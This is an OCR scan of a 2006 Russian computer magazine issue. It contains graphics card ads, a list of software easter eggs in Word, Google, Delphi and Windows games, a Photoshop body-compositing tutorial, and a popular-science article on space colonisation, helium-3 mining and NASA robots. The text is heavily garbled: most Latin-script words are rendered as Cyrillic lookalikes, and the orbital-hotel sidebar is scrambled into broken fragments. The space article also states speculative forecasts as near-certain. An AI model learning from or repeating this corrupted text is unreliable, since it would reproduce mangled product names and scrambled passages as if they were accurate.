XI 600 ХТ, выполненный по технологии 90нм 

• Видеопамять 256МБ БОРЗ 

• Поддержка НЮТѴ-ОиІ 

• ОиаІ-Ыпк йѴІ для высокого разрешения экрана 

• Технология улучшения изображения Аѵіѵо™ 
для ТѴ и дисплея 

• Интерфейс РСІ Ехргезз 16х 

• Полная аппаратная поддержка приложений 
ОігесІХ 9.0 и ОрепСЬ 2.0 




КХ1 600ХТ-Т2Р256Е2 



Высочайшая эффективность охлаждения 
на тепловых трубках, "нулевой" уровень шума 

• Мощный графический процессор РАОЕОІМ™ 

XI 600 ХТ, выполненный по технологии 90нм 

• Видеопамять 256МБ БОНЗ 

• Поддержка НЮТѴ-Оиі 

• ОиаІ-Ыпк йѴІ для высокого разрешения экрана 

• Технология улучшения изображения Аѵіѵо™ 
для ТѴ и дисплея 

• Интерфейс РСІ Ехргезз 16х 

• Полная аппаратная поддержка приложений 
ОігесІХ 9.0 и ОрепСЬ 2.0 





КХ1 300РКО-Т0256Е 



• Мощный графический процессор РАОЕОЫ™ 
ХІЗООРРО, выполненный по технологии 90нм 

• Видеопамять 256МБ ООР2 

• Поддержка ШТѴ-ОиІ 

• ОиаІ-Ыпк йѴІ для высокого разрешения экрана 

• Технология улучшения изображения Аѵіѵо™ 
для ТѴ и дисплея 

• Интерфейс РСІ Ехргезз 16х 

• Полная аппаратная поддержка приложений 
ОігесіХ 9.0 и ОрепСЬ 2.0 















ПАСХАЛЬНЫЕ ЯЙЦА 

ВСЕ ЗНАЮТ, ЧТО В БОЛЬШОМ СОФТЕ РАЗРАБОТЧИКИ ОЧЕНЬ ЧАСТО ОСТАВЛЯ- 
ЮТ «ПАСХАЛЬНЫЕ ЯЙЦА» — ЗАБАВНЫЕ, НЕДОКУМЕНТИРОВАННЫЕ ВОЗМОЖ- 
НОСТИ. ТЫ, КОНЕЧНО, ПОМНИШЬ, ЧТО, ВВЕДЯ СЕКРЕТНУЮ КОМБИНАЦИЮ КЛА- 
ВИШ, 97-Й ОФИС МОЖНО БЫЛО ЛИХО ПЕРЕДЕЛАТЬ В ДУМ, А 2К ВЕРСИЮ — 
В ЫЕЕЭ РОР ЗРЕЕЭ И ПОГОНЯТЬ НА МАШИНКАХ. НО ЭТО ВСЕ СТАРЬЕ. ОКАЗЫВА- 
ЕТСЯ, ЧТО В АКТУАЛЬНОМ СОФТЕ ТОЖЕ ПОЛНЫМ-ПОЛНО ПАСХАЛЬНЫХ ЯИЦ! 



ВЕСЕЛЫЙ ОРРІСЕ 

| Запусти ѴѴогсІ, введи и нажми 

Епіег. Впечатляет? Столько французских булок тебе не 
съесть, приятель! I Если в ворде написать фразу 
«правоспособность-способность лица иметь гражданские права и 
нести обязанности», то злосчастный редактор сразу же закроется без 
сохранения документов, причем это произойдет намного быстрее, чем ты 
успеешь понять, что же случилось. Своеобразная оптимизация закрытия ѴѴогсГа :). 

| Аналогично, если запустить проверку правописания для фразы 
«правоспособность-способность права» и допечатать к ней несколько слов. ѴѴогсІ 
закроется, ничего не сказав и не спросив. | Хочешь, чтобы ѴѴогсІ завис? Тогда введи другую 
фразу: «уточнение наличия запасов м.с.;», и твой редактор живо откинет копыта. | Возьми 
дистрибутив ОНІсе, найди файл СОВІМР32.РІ_Т (он будет в каталоге 
\РРИЕ$\СОММОМ\М55НАВЕО\СВРНЕЕ7\). Открой его в любом текстовом редакторе (только не в 
ѴѴогсІ). Почти в самом конце этого файла (90% в моем просмотрщике) ты обнаружишь интересное, но 
чрезвычайно матерное двустишие :). Это наши соотечественники, работающие в Місгозой, оставили нам 
послание, чтобы мы знали кто на самом деле разрабатывает продукты Місгозой. 

ЯЙЦА СООСІ-Е I Зайди в (Зоодіе ( ѵѵѵѵѵѵ.сюоаіе.согл ) и введи запрос апзѵѵег Іо Не (бе ипіѵегзе апб 
еѵегуібіпд . Появится... калькулятор. О нем ты сможешь прочитать на самом (Зоодіе. | Но это еще не все. Хочешь 
поиграть в симпатичную игрушку? Зайди на ѵѵѵѵѵѵ.аооаІе.сот/ЕазІегДеаІиге еазіег.ігіті . Перед тем как ты это 
сделаешь, убедись, что в твоем браузере включена Заѵа. 

ИЕНОбІ Зайди в Иего и выбери «Помощь» -» «О программе». Появится окно о программе. Дважды щелкни 
по картинке — в нижней части окна увидишь волнообразную бегущую строку с именами разработчиков. 
ВОШ.АЫО РЕІ.РНІ 2005 1 Даже в Оеірбі есть пасхальное яйцо. Честно говоря, работаю с Оеірбі. 
если мне не изменяет память с 1998 года, и не знал. Узнал только в прошлом году. Причем данная возможность была 
доступна еще со времен 6-й версии Оеірбі. Выполни команду Неір, АЬоиІ (в Оеірбі), потом при зажатой клавише АН введи 
ТЕАМ — увидишь имена и фамилии разработчиков. 

ОТШПАП 3.30 1 Открой окно «О программе» и щелкни в левой части книги — она начнет двигаться. А если 
щелкнуть на красивой надписи ѴѴІпРАР, то за ней появятся волны (причем они будут в движении), а если немного 
подождешь, то на горизонте увидишь парусник. 

АВВУІ Хочешь увидеть имена разработчиков АВВУУ ЕіпеРеабег 7.0 РЕ или АВВѴУ Ипдѵо 9? Запусти одну из этих 
программ, открой окно «О программе» и дважды щелкни на значке сканера (или словаря — в случае с Еіпдѵо). Вот и все. 
ШТЕПЫЕТ ЕСС8РІ.ОНЕП I Запусти ІЕ 6 и в строке адреса введи аЬоийтогіІІа. Увидишь пустой 
документ, но с синим цветом фона. Непонятно, почему именно для МоаІІ'ы ІЕ выводит такой документ? | Хочешь увидеть 
имена разработчиков ѴѴІпбоѵѵз? Без проблем. Правда, придется немного потрудиться. Открой Іпіегпеі Ехріогег и в строке 
адреса введи гез://зЬбосІс.бІІ/ѵѵсее.б1т. Откроется просто страничка с черным фоном. Открой ее исходный код и найди 
функцию ОпІ_оасІ(), в которой удали строки 
І1 (0есобе31г("диг]РВВ") != ѵйпсіоѵѵ.пате) 
геіигп; 

Полученный файл сохрани под другим именем и открой его в Іпіегпеі Ехріогег. 

РОМТ8-ЕСС8 1 В ѴѴІпбоѵѵз ХР тоже есть своеобразное пасхальное яйцо. Зайди в папку Шрифты в 
панели управления. Нажми Сігі + А, а затем — АІ1 + Епіег. По идее, ты должен будешь увидеть суммарный объем, 
занимаемый всеми шрифтами. Но вместо этого откроется довольно много окошек «Свойства» — по одному 
для каждого шрифта. Размер можно посчитать самому — вручную. Единственный неприятный момент — 
тебе придется довольно долго их закрывать. 

ЧЕМПИОНЫ МИРА ПО ПАСЬЯНСУ I Ты никак не можешь разложить 

пасьянс Солитер? Тогда нажми Сігі ч- Зйій ч- 10. В появившемся окне нажми кнопку Прервать (АЬогІ). 
Внимательно прочитай сообщение в появившемся окошке: кнопка Прервать используется 
именно для выигрыша. После этого сделай ход — через секунду пасьянс будет разложен. | 

Но это еще не все. Запусти Солитер снова и нажми РЗ. Появится окошко выбора расклада. 

Введи номер расклада -1 или -2. Получишь довольно интересные расклады 

| Пасхальные яйца есть и в Сапере. Закрой все окна так, чтобы был виден 
верхний левый угол экрана. Теперь запускай Сапер, сразу после запуска 
введи хугду и нажми левый Збій. После этого води мышкой по игровому 
полю с нажатой клавишей ЗЫК и наблюдай за верхним левым 
углом. Если ты подведешь указатель мыши к клетке, под 
которой нет мины, то самая верхняя левая точка будет 
белой, если же под указателем мыши будет 
мина, то точка будет черной. 



АІ1 + Збій + РгіЗс 
ок? 
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ДИЗАИН 




ТЕХТ ЦАЗОЫ АПВЕП / иА5СШ@Р1ХЕ1_511КСЕОЫ.СОМ / 

Джейсон — главный редактор и один из основателей онлайн-журнала 
Ріхеізигдеоп (мллллріхеізигаеоп.соті посвященного дизайну. Кроме этого, 
он является арт-директором Зіагі Сгеайѵе и нового проекта СНІІсігеп о( РіпІапсІ. 
Говорят, Джейсон пользуется РЬоІозІіор'ом, начиная с самой первой версии, 
и даже видит сны в режиме І_ауег ВІепсІ! А еще ему нравится заставлять людей 
нервничать, абсолютно ничего не делая. 




Бегло взглянув на фотографию, можно сказать, что вое в порядке. Но стоит 
присмотреться, и понимаешь — что-то все-таки не так. Действительно, челове- 
ческое тело не способно сгибаться под такими углами... 

Ловкость рук — никакого обмана! Или, скорее, ловкость компьютерной мыши, 
так как это полностью цифровая работа. Секрет ее реалистичности заключается 
в правильном выборе мест соединений и аккуратной подгонке объектов. 

Как всегда, работа начинается уже на этапе съемки. Если делать съемку поэ- 
тапно, то неизбежно возникнут проблемы освещения, поэтому лучше провес- 
ти вою съемку за один раз. То же касается и резкости — разные степени раз- 
мытости контуров не сделают жизнь проще. 



ПППТАВИМ КОЛОРИТ 

цвета на нескольких изображениях - полезная но- 
жа РбоіозИор СЗ (Ітаде > Афзітепіз > МаісП Соіог). При помощи этого 
тгрумента можно, например, на разных фотографиях сделать одинаковым 
п кожи. Маісб Соіог позволяет подогнать цвета в двух одновременно 0 ™рь 
х файлах или в разных слоях одного изображения. Программисты АбоЬе 
5отились о множестве настроек для искушенных профи, однако добитьс 
плохих результатов, сделав всего пару ютиков, сможет даже новичок. 



УРОКИ 

ГИМНАСТИКИ 

ІіФОКУСЫ, ПОДОБНЫЕ ЭТОМУ, ИСПОЛ- 
НЯТЬ НЕ ТАК-ТО ПРОСТО. ДЛЯ ЭТОГО НУЖ- 
НО ИСТИННОЕ МАСТЕРСТВО ПРИ РАБОТЕ 
С КИСТЯМИ, МАСКАМИ И ВЫДЕЛЕНИЯМИ. 
ЕСЛИ ПРОСТО СКЛЕИТЬ РАЗНЫЕ ЧАСТИ 
ФИГУРЫ, ТО ТАКОЙ ЭФФЕКТ ВРЯД ЛИ ПО- 
ЛУЧИТСЯ ДОСТИЧЬ! 99 



050 



ХАКЕР 03 /87/ 06 




01 СНАЧАЛА СПРАВА... 

Откроем файл дігЦідІіІ.сІпд в РЬоІозИор'е. 
На экране появятся настройки для импорта 
Раѵѵ-графики. Внесем необходимые измене- 
ния и либо сохраним их, используя кнопку 
Заѵе, либо просто запомним, что и как мы 
меняли, чтобы выполнить те же действия со 
следующим файлом. Как только все настро- 
ено, нажмем Ореп. 




04 МЕНЬШЕ ТОЧЕК 



Вооружившись инструментом Реп, начнем об- 
водить верхнюю фотографию. Чтобы контур 
получился максимально гладким, постараемся 
использовать как можно меньше промежуточ- 
ных точек (возможно, для этого придется пот- 
ратить немного времени на освоение кривых 
Безье). Небольшая подсказка: нет необходи- 
мости сохранять все детали. Никто ведь не уз- 
нает, что мы оставили за кадром прядь волос, 
которую не получилось обвести аккуратно! 




02 ...ЗАТЕМ СЛЕВА! 



Откроем следующее изображение (дігМеН.сІпд) и 
применим те же настройки Сатега Ваѵѵ. Когда 
обе картинки импортированы, необходимо убе- 
диться в адекватности цветов — цифровые каме- 
ры в автоматическом режиме могут искажать 
цвет от кадра к кадру. Если разница между фо- 
тографиями налицо, можно использовать фильтр 
Соіог МаІсН (см. врезку «Сопоставим колорит») 
для их коррекции. Впрочем, обычно разница не- 
велика, и этот шаг скорее всего не пригодится. 




05 СОЗДАЕМ ВЫДЕЛЕНИЕ 



Поскольку джинсы нам в этом кадре не пона- 
добятся, то обводить их мы не станем — оста- 
вим только лишь часть бедер, чтобы потом бы- 
ло проще подгонять верхнюю картинку к ниж- 
ней. Как только контур завершен, конвертиру- 
ем его в выделение, кликнув по нему, удержи- 
вая <СігІ>, и нажимаем на кнопку І_оасІ РаІИ Аз 
А Зеіесііоп в нижней части панели РаіИз. Те- 
перь скопируем выделенную область в новый 
слой, выбрав Ьауег > /Ѵеѵѵ > Ьауег Ѵіа Сору. 




07 ВЫРЕЗАЕМ НИЖНЮЮ ЧАСТЬ 

Как только контур завершен, повторим 
действия из шага 5, чтобы скопировать ниж- 
нюю часть тела также в новый слой. Теперь 
создадим новый слой, залив его каким-ни- 
будь ярким цветом (например, синим), чтобы 
увидеть недочеты проделанной работы. 



І 



08 ГРУППИРУЕМ ПАРАМИ 

Мы получили две отдельных части девушки, плы- 
вущие в синей бесконечности. Поскольку джин- 
сы были вырезаны точно по талии, то мы реши- 
ли, что слой с ногами будет верхним. «Подце- 
пив» его мышкой, перетащим его в самый верх 
слоев на панели іауегз. После этого создадим 
новую папку слоев (Ыеѵѵ Огоир в С32 или 1_ауег 
Зеі в С31). В нее мы сложим исходные изобра- 
жения, так как никто не знает, когда они нам по- 
надобятся в следующий раз. Нажмем на глаз 
слева от папки, чтобы скрыть ее содержимое. 



4 




03 СОХРАНЯЕМ 

Выбрав инструмент Сгор, избавимся от лиш- 
него фона, оставив немного места по краям 
изображения, просто чтобы не было тесно. 
Теперь перенесем изображение дігІ_гідЫ: в 
соседнее фото — появится новый слой. Те- 
перь нам лучше сохранить свою работу в 
формате РЗй под новым именем. 




06 ОЧЕНЬ БЛИЗКО: ТАЛИЯ 



Теперь проделаем все то же самое с фото, из 
которого мы хотим взять только нижнюю часть. 
Особое внимание стоит уделить верхнему краю 
джинсов, поскольку это будет место стыковки 
двух наших фрагментов. Если во время созда- 
ния контура работу сильно приблизить, то вы- 
деление будет более точным и аккуратным. 




09 РАЗУМНЫЕ ОБЪЕКТЫ 



Когда мы попытаемся совместить две поло- 
винки тела, то обнаружим, что угол между 
ними не совсем верный, поэтому верхнюю 
часть нам придется немного развернуть. 
Чтобы не возникло проблем с пикселизаци- 
ей, превратим слой в 8тагі ОЬіесі: кликнем 
по слою на панели іауегз и, нажав на ма- 
ленькую черную стрелку в правом верхнем 
углу панели, выберем Огоир Іпіо Л/еи/ 8тагі 
ОЬіесі Если дело происходит в 031, где 
этой функции нет, придется работать так. 
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10 СОВМЕЩАЕМ! 

Развернем верхнюю часть девушки, выбрав в 
меню Есііі > Тгапзіогт > Поіаіе, чтобы обе час- 
ти тела подходили друг к другу как можно луч- 
ше. За ориентир возьмем верхний край джин- 
сов. Возможно, стоит сделать на панели іауегз 
верхний слой полупрозрачным, чтобы наблю- 
дать, что происходит с обоими слоями однов- 
ременно. Когда все готово, вернем непрозрач- 
ность к исходным 100%. 




1 1 НАДЕНЕМ МАСКУ 

Теперь самое интересное. Нужно соединить по- 
ловинки так, чтобы никто не догадался, где про- 
ходит линия стыка. Создадим іауег Мазк для слоя 
с джинсами, нажав на АсІсІ іауег Мазк на панели 
іауегз. Теперь осторожно скроем лишние части 
изображения мягкой черной кистью. Выбирать, 
что оставить, а что убрать, придется методом 
проб и ошибок — хорошо, что маска позволяет 
легко исправить все неверные действия. 




13 ШУМ В ТЕНИ 



Для создания тени лучше использовать цвет, 
взятый непосредственно с джинсов, — в этом 
нам поможет инструмент Еуесігоррег. Не смотря 
на то, что эффект будет почти незаметным, сто- 
ит добавить немного шума ( Еіііег > Моізе > АсІсІ 
Л/о/зе), чтобы тень соответствовала общей текс- 
туре фотографии. Будем экспериментировать с 
небольшими значениями, пока нам не покажет- 
ся, что нам удалось повторить текстуру. 




16 НАМЕКАЕМ НА ПОЯ 

Сейчас есть ощущение, что девушка зависла 
в безбрежном голубом пространстве. Чтобы 
избавиться от него, нарисуем несложный 
«пол», на котором она стоит. Чтобы создать 
иллюзию горизонтальной поверхности, мы отб- 
росим от ног девушки две легкие тени. Созда- 
дим новый слой и зададим ему тип наложения 
МиШрІу, отметив Орасііу 50 — 60%. В нем мы 
и нарисуем нашу тень под ногами девушки. 




Чтобы ничего не растерять на панели І_ауегз, бу- 
дем группировать слои в папки. Тут, кстати, следу- 
ет упомянуть то, что в РЬоІозІюр’е С31 и С32 слои 
скрепляются разными способами: в С31 для этого 
служит скрепка, в С32 она есть тоже, но привязать 
слои друг к другу можно и просто, кликнув по нуж- 
ным слоям, удерживая <ЗШ>. После того как мы 
связали все нужные нам слои, нажимаем на ма- 
ленькую черную стрелку в правом верхнем углу па- 
нели и выбираем Ыеѵѵ Ѳгоир Ргот І_ауегз. 




17 ТЕНЬ ПОД НОГАМИ 



Повторим примерно то же самое на новом слое, 
используя большую кисть и Орасііу 18%. Теперь 
нарисуем широкую линию, соединив ею обе 
ступни. При помощи іауег Мазк и кисти меньше- 
го диаметра немного сузим тень в самом центре. 




12 ХИТРЫЕ МАСКИ 



Теперь, когда все готово, добавим легкую тень, ко- 
торую футболка должна отбрасывать на джинсы, — 
это сделает картинку еще более естественной. Соз- 
дадим новый слой над слоем с джинсами и откон- 
вертируем его в СІірріпд Мазк , выбрав Сгеаіе 
СІірріпд Мазк в меню І_ауег. Благодаря этому нехит- 
рому действию все, что мы нарисуем в этом слое, 
будет ограничено контурами изображения под ним, 
поэтому можно не беспокоиться, что тень окажется 
на футболке или животе девушки. 




15 ОТБРАСЫВАЕМ ТЕНЬ 

Сделаем копию только что созданной папки, 
перетащив ее значок на кнопку Сгеаіе А Л/еѵѵ 
іауег в нижней части панели 1_ауегз. Поскольку 
применять стили слоя к группам пока нельзя, 
просто склеим все слои папки в один, выбрав 
Мегде Ѳгоир из меню. Теперь от этого слоя 
можно отбросить легкую тень — йгор Зііасіоѵѵ. 




1 8 НАСЫЩЕННОСТЬ И КОНТРАСТ 



Теперь, когда работа почти закончена, можно 
заняться мелочами. Например, немного пора- 
ботать со значениями Сопігазі и Заіигаііоп. 
Чтобы случайно чего-нибудь не напортить, 
воспользуемся Асііизітепі іауегз. Кликнем на 
черно-белом кружке внизу панели іауегз и вы- 
берем іеѵеіз. Сдвинем черный и белый движки 
ближе к центру, увеличив тем самым контраст. 
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ТЕХТ ЮРИЙ СВИДИНЕНКО / МЕТАМОЯРН@ѴАЫОЕХ.П(І / 

КОСМИЧЕСКАЯ 

ОДИССЕЯ 

КАК ПРОДВИНУТЫЕ 
ПЕРЦЫ КОСМОС 
ПОКОРЯЮТ 



ЗВЕЗДЫ — ХОЛОДНЫЕ ИГРУШКИ 

Для тебя не секрет, что на Земле скоро ста- 
нет тесно, причем ОЧЕНЬ скоро, буквально в 
течение этого века. Связано это, в основном, 
с резким увеличением продолжительности 
средней жизни человека. Биотехнологии, 
генетика и наномедицина медленно, но верно 
избавляют нас от таких страшных болезней, 
как рак, СПИД, геморрой и т.д. Вскоре — лет 
так через 40 — пойдет всерьез речь о том, 
что делать с армией здоровяков-старичков, 
которым уже за 80 (а в развитых странах уже 
давно думают, что вообще делать со старика- 
ми и их болезнями, которые обходятся нало- 
гоплательщикам весьма недешево. — Прим. 
Ог.). Еще через 10 лет — и того хуже: пер- 
спектива личного бессмертия станет вполне 
реальной. 

Так вот, всем этим бессмертным пенсионерам 
и китайцам нужно будет где-то жить. На нашей 
планете это возможно еще в течение лет ста, 
но жить уже дальше будет невозможно, так как 
все будут сидеть друг у друга на головах. Для 
решения этого вопроса и существует такая 
интересная штука, как освоение планет, но 
пока мы ограничиваемся только пределами 
нашей солнечной системы. 

Еще одна проблема состоит в том, что этой 
толпе пенсионеров нужна будет уйма энер- 
гии, которой уже сейчас не хватает. Дело в 
том, что запасов мировой энергии (нефть, 
газ) хватит только до середины нашего века, 
то есть до 2050 — 2060 годов. Потом бензин 
станет одним из музейных экспонатов, а все 
машины будут ездить на батарейках. Но и эта 
проблема решается, если освоить наши кос- 
мические окрестности. 



Как ты можешь видеть, современное разви- 
тие летательных космических средств про- 
текает вяло. В 50 — 60 годах прошлого века 
все прогрессивное человечество думало, 
что вот-вот состоится полет первой ракеты 
на ядерном двигателе, в 70 — 80 — фотонной 
ракеты, но, похоже, свои силы мы переоце- 
нили - ничего подобного сейчас в космос не 
летает. Главная причина такого застоя — то, 
что космос перестал быть интересным для 
военных в прошлом веке, а закончившееся в 
90-х годах противостояние «Совка» и Америки 
полностью отменило всякие глобальные про- 
граммы полетов. 

И тут впервые на горизонте появляются китай- 
цы, которые не только отправляют человека в 
космос (что, собственно, не такой большой 
прикол), но и обещают построить в 2020 году 
на Луне базу по добыче гелия-3. Американцы 
и россияне тоже не отстают: с задержкой в 
несколько месяцев они тоже заявляют в СМИ 
о намерениях полететь на Луну раньше кон- 
курентов — в 2015. Для справки: гелий-3 — 
ценнейший энергетический ресурс, который 
является идеальным экологически чистым 
топливом для термоядерного синтеза. 

При его использовании не возникает радиа- 
ции, поэтому проблема захоронения ядерных 
отходов, так остро стоящая перед миром, 
отпадает сама собой. Его запасы в верхних 
слоях поверхности Луны достигают около 500 
миллионов тонн. На Земле этот изотоп прак- 
тически отсутствует, в недрах планеты его не 
более нескольких сотен (!) килограммов. 
Гелий-3 на Луну в течение миллиардов лет 
приносит солнечный ветер. Ученые узнали о 
его существовании на Луне, проводя анали- 



зы грунта, доставленного со спутника Земли 
советскими автоматическими станциями и 
американскими астронавтами. 

Чтобы обеспечить на год все человечество 
энергией, необходимо лишь два-три (!) поле- 
та космических кораблей грузоподъемностью 
в 10 тонн, которые доставят гелий-3 с Луны. 
Затраты на межпланетную доставку будут в 
десятки раз меньше, чем стоимость выраба- 
тываемой сейчас электроэнергии на атомных 
электростанциях. 

ЧУЖИМИ РУКАМИ 

Вот и представь себе, что жадные китай- 
цы успели первыми, и уже объявили моно- 
полию на лунную энергию. Что делать в 
2060 — 2070 годах бессмертным старичкам? 
Раскошелиться. А поскольку никто этого 
делать не любит, все богатые державы хотят 
успеть первыми. А так как на разработку 
проекта потребуется всего 25 — 30 милли- 
онов долларов, то можно ожидать, что успе- 
ют поселиться на луне и отдельные частни- 
ки. Не зря же частные космические корабли 
сейчас пользуются такой популярностью у 
инвесторов, в первую очередь у компаньона 
Билли — Пола Аллена. Ты, наверное, слышал 
об успешных полетах Зрасе ЗЬІр Опе. И это 
только начало. Скоро в космос будут летать 
все кому не лень. Отельный магнат Бигелоу 
подготовит для «космических жителей» спе- 
циальные орбитальные отели, а современ- 
ные разработки в области ионного косми- 
ческого привода позволят сделать космичес- 
кие корабли маневренными и относительно 
быстрыми. Окололунное пространство будет 
вскоре занято космотуристами, грузовым 
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Робонавт умеет даже гайки закручивать! 



флотом, перевозящим гелий-3, и разными 
частными орбитальными станциями. 

Если повезет, то в 2020 году или немного 
позже тебе удастся увидеть запуск кос- 
мического лифта. Это гораздо упростит 
все транспортные перевозки с Земли на 
орбиту. 

Короче говоря, в близком космосе перспекти- 
вы развития не так уж и плохи. Что же мешает 
нам летать дальше? Почему до сих пор, напри- 
мер, никто не летает на Марс? Ну, во-первых, 
в этом нет необходимости. Во-вторых, пока 
бравые астронавты долетят до Марса на сов- 
ременных ракетах, половина из них умрет от 
лейкемии, а вторая половина скончается на 
обратной дороге, ведь в космосе очень много 
различного излучения и космических лучей. 
Возле Земли нас еще как-то защищает магнит- 
ное поле, но если собираешься лететь дальше 
— надо сразу покупать белые тапки, так как 
достоверно известно, что больше по пути ими 
никто не торгует. 

ЫАЗА вкладывает огромные деньги в изуче- 
ние противорадиационной защиты, которая 
сможет помочь хотя бы для экранирования 
астронавтов по пути на Марс и обратно. Но 
дальние путешествия нам пока не светят. 

Вот почему вместо Гагариных в космос все 
чаще посылают роботов, благо кибернетика в 



последнее время развивается не по-детски. И 
в первую очередь взгляд ученых остановился 
на кластерных роботах, о которых я рассказы- 
вал в прошлом номере Импланта. 



ЛУННАЯ АМЕБА 

Представь себе такую картину: к Луне под- 
летает автоматический зонд, от которого 
отлетает цилиндрик, приземляется на лунную 
поверхность и там раскатывается в настоя- 
щий блин, способный к тому же ползать по 
поверхности нашего спутника и выполнять 
кучу полезной работы: копать, собирать мине- 
ралы и гелий-3, строить лунную базу, прово- 
дить разведку на местности и многое другое. 
Это сегодня кажется фантастикой, но только 
сегодня. Робота-амебу ЫАЗА считает помощ- 
ником №1 в лунной миссии и добыче полез- 
ных ресурсов. 

Проект ІМАЗА называется «Автономные 
нанотехнологические рои» (Аиіопотоиз 
ІМапоІесНпоІоду Зѵѵагтв — АІЧТЗ) и разраба- 
тывается с 1996 года в исследовательском 
космическом центре Годдарда (Сосібагб Зрасе 
ЕІІдМ Сеп(ег) совместно с исследовательским 
центром Лэнгли (1_апдІеу ВезеагсЬ Сепіег). 

В частности, они построили робота ТЕТѵѵаІкег, 
то есть «ходока тетраэдрического», который 
служит прототипом маленького элемента 
будущей нанотехнологической «амебы». О 
кластерных нанороботах и конструктивном 
тумане я тоже рассказывал в прошлом выпус- 
ке Импланта, так что если тебе стало интерес- 
но, что вообще такое фрактальный наноробот 
— почитай. 

МАКРОробот ТЕТѵѵаІкег — это пирамида из 
шести стержней, соединенных узлами, в каж- 
дом узле находится электроника и электродви- 
гатели, способные в широких пределах менять 
длину стержней. Правильным тетраэдром дан- 
ный робот является, только находясь в покое. 
Зато когда робот хочет попутешествовать, он 
меняет свою форму так, что центр тяжести 
выносится за предел опоры. Тут же следует 
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Гостиничный магнат из Лас-Вегаса, Роберт Бигелоу 
ключил пари на $500 миллионов: до 2015 года его кос- 
мический отель откроет двери для первых постояльцев 
Если затея Бигелоу удастся, то нынешние редкие туристичес- 
кие поездки на Международную Космическую Станцию (МКС) 
покажутся пустяком по сравнению с потоком в десят и тур став 
которые будут проводить свой отпуск на орбитальной станции 
специально построенной для этой цели 
Бывший инженер МАЗА, Уильям Шнайдер, который участвовал 
разработке ТгапзНаЬ, поначалу со скепсисом отнесся к пре ^ 

дамоТ ѵж ° У ПР ° Д0ЛЖИТЬ работ У на Д ^м же -космическим 
домом» уже для частного проекта. 

іяТмаи™ РЯДа Переделок ' проект ТгапзНаЬ превратил- 
~ РВЫИ В мире орбитальный отель. На орбиту 
ракета должна вывести модуль, состоящий из жесткого -ядра» 

рнуты * вокруг него > словно десятки полотенец, надувных 
ен. Внешний диаметр конструкции — 4,57 метра. После запус 
ка система жизнеобеспечения накачает внутрь воздух который 

т 2 У метаа Н Ел” 0 ДИЭМѲТРа ^ МѲТра ' ДлИНа «"составит 
13,72 метра. Благодаря этому -отель» можно будет вывести в 

космос сравнительно небольшой ракетой. Да и вес этого ссору 

жения благодаря широкому использованию полимеров и кев 

лара, будет не так велик, как аналогичный модуль построеннь й 

Гс;°и С е ТЬ п Ю ер И е 3 бГ ТаЛЛ ° В ' Нв ^ ™ 

жесткие переборки, развернутся солнечные батареи Здесь же 

«Да^о В та бь?о Н о Ь Ц СТЫК0В °-п Ые УЗЛЫ ДЛЯ ПрИема кораблей ' Каких? 
-Да хотя бы российских "Союзов"», - размышляет Бигелоу Хотя 

ельзя исключать появления новых «извозчиков» построенных 
частными фирмами. роенных 

с К кГьГппТле НѲРЫ ' раб0тающие "ад отелем, представляют, 
еГчто л па и ИМ еЩѲ предстоит Р ешить ' Сам Бигелоу счита- 
' его вероятность выиграть пари составляет 60% 

Магнат рассчитывает продавать билеты на свою станцию (на 

шГчГнГног 3 М ° ЖеТ бЫТЬ ' НеДѲЛЮ) ПРИМерН ° П ° 38 ми лли- 
ТУРИСТЫ пЦятГп НИЖе ' Чем Цена ' которую пе Р ВЬ| е космические 

^ссчитГи То 38 вИЗИТ НЭ МКС ($2 ° миллионов )' Эксперты 

- такими расценками Бигелоу получит 20 30 

постояльцев в год. у 



№и(ІІиз будущий орбитальный отель 



опрокидывание на бок, но поскольку все сто- 
роны машины совершенно равнозначны, то 
никакого «падения» нет. Так робот и двигает- 
ся. Каждый узел в вершине пирамиды может 
нести камеры и сенсоры, так что перед нами 
работающий прототип робота для исследова- 
ния других планет, только в единичном экземп- 
ляре и не такой маленький, как надо для АІЧТ8. 
Теперь, если каждый тетраэдр дополнить 
стыковочным механизмом, мириады подобных 
машин смогут формировать ту самую «живую 



амебу», меняющую форму в зависимости от 
условий, а также заживляющую пробоины в 
самой себе. 

Миниатюрные и сравнительно простые про- 
цессоры таких модулей смогут объединяться 
в единый компьютер, возможно, похожий на 
нейронную сеть, что позволит существенно 
облегчить работу исследователей при освое- 
нии нового небесного тела. 

Авторы проекта предлагают называть такие 
корабли-роботы роями, хотя, учитывая, что 
его элементы будут соединены между собой, 
больше подошло бы определение «многокле- 
точный организм». 

Нынешний МАКРОтреугольный робот — 
наглядный пример того, как может работать 
одна клетка такого робота-роя. Он уже не 
только катался по полу лаборатории в центре 
Г оддарда, но уже успел побывать на испыта- 
ниях в Антарктиде. В январе 2005 года маши- 
на оказалась на научной станции Макмердо, 
где условия во многом напоминают Марс. 

Когда этот проект будет трансформировать- 
ся в микро- и наномасштабы, то телескопи- 
ческие стержни можно будет заменить на 
свертывающиеся металлические ленточки 
или углеродные нанотрубки, что позволит 
«клеткам» будущей единой машины сжимать- 
ся почти до соприкосновения узлов, а значит, 
можно будет отправить на орбиту в одном 
запуске большее их количество. 

В рамках данного проекта ЫАЗА развивает 
новое программное обеспечение, позволя- 
ющее треугольникам собираться в разные 
машины-трансформеры . 

РОБОНАВТОВ — В КОСМОНАВТЫ 

Дело было вечером, на МКС делать было 
нечего. Все орбитальщики мучили новое 
достижение западной кибернетики — дистан- 
ционно управляемого робота-космонавта, а в 
простонародьи — робонавта. Вот представь: 
сидишь ты внутри космического корабля, а 
тут метеорит в стенку — бах! Надо вылезать, 
брать ключ на 12 и газосварку — завари- 
вать пробоину. Но это было бы, если бы мы 
навеки остались в прошлых 60-х. Сегодня ты, 
как храбрый капитан, надеваешь очки вир- 
туальной реальности и посылаешь наверх 
юнгу-робонавта, который заварит под твоим 
непосредственным руководством что угодно. 
Удобно? Еще бы! Зачем рисковать лишний 
раз, когда можно направить это благородное 
дело (риск) на соблазнение девушек, напри- 
мер, а не на уничтожение жизненно важных 
органов в космосе. Роботу-то все равно. Он 
железный. 

Робонавт, чудо мехатроники и кибернетики, 
сконструированный по заказу МАЗА и БАРРА, 
по строению похож на живого человека. У 
него нервные узлы, аналогичные морфологии 
нашей нервной системы. Он также на аппа- 
ратном уровне «понимает», где право, где 
лево, а его руки, с пятью пальцами на каждой, 
по проворности обскачут любого космонавта. 
Все его пропорции выбраны таким образом, 
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Схема зонда, который полетит в Европу 



что он способен путешествовать по МКС и 
современным космическим кораблям без 
труда. Также предусмотрено его складыва- 
ние в специальные отсеки для того, чтобы не 
мешал, когда он не нужен. 

По количеству сенсоров он может переплю- 
нуть любого существующего робота. В каж- 
дой его руке не менее 150 тактильных сенсо- 
